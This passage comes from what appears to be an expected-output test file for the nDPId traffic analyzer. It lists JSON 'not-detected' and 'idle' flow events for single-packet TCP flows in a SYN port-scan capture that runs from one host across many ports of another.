{"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1271,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1272,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1272,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3322,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060643,"flow_last_seen":1278275060643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3322,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060643,"flow_last_seen":1278275060643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3323,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3324,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3324,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3323,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3324,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3324,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1069,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3325,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1069,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3325,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1277,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1277,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3325,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3325,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1277,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1277,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":40193,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":40193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":40193,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":40193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060559,"flow_last_seen":1278275060559,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3333,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060559,"flow_last_seen":1278275060559,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060661,"flow_last_seen":1278275060661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3333,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060661,"flow_last_seen":1278275060661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1287,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060597,"flow_last_seen":1278275060597,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1287,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060597,"flow_last_seen":1278275060597,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7435,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7435,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7435,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7435,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9485,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9485,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":858,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9485,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":858,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9485,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1296,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1296,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1296,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 